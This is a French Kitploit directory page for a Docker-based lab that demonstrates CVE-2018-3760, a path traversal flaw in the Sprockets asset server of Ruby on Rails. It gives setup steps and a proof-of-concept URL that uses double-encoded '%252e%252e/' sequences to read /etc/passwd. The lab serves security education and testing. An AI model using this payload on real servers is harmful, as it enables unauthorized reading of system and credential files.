Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760- — Lab basé sur Docker démontrant le path traversal CVE-2018-3760 dans Ruby on Rails Sprockets, avec POC et configuration d'environnement pour les tests de sécurité et l'éducation. | Kitploit
Outils/GitHubGitHub/cyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebApprentissage et ÉducationLabs et Pratique
GitHubcyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-

Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-

Lab basé sur Docker démontrant le path traversal CVE-2018-3760 dans Ruby on Rails Sprockets, avec POC et configuration d'environnement pour les tests de sécurité et l'éducation.

Voir le dépôt
31il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité de traversée de chemin dans Ruby On Rails (CVE-2018-3760)

中文版本(Chinese version)

Ruby On Rails est un framework de développement Web Ruby bien connu, qui utilise Sprockets comme serveur de fichiers statiques dans l'environnement de développement. Sprockets est une bibliothèque Ruby qui compile et distribue les fichiers de ressources statiques.

Il existe une vulnérabilité de traversée de chemin causée par un double décodage dans Sprockets 3.7.1 et versions antérieures. Un attaquant peut utiliser %252e%252e/ pour accéder au répertoire racine et lire ou exécuter n'importe quel fichier sur le serveur cible.

Liens de référence :

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • https://seclists.org/oss-sec/2018/q2/210
  • https://xz.aliyun.com/t/2542

Configuration de l'environnement

Exécutez la commande suivante :

root@kitploit:~
docker-compose up -d

Accédez à et vous verrez la page d'accueil.

http://your-ip:3000

POC

Une erreur sera générée en accédant directement à http://your-ip:3000/assets/file:%2f%2f/etc/passwd, car le fichier /etc/passwd ne se trouve pas dans le répertoire autorisé.

Nous pouvons obtenir une liste des répertoires autorisés depuis la page d'erreur. Il suffit d'en sélectionner un, par exemple /usr/src/blog/app/assets/images, puis d'utiliser %252e%252e/ pour remonter au répertoire parent, et enfin lire le fichier /etc/passwd :

root@kitploit:~
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

Télécharger l’outil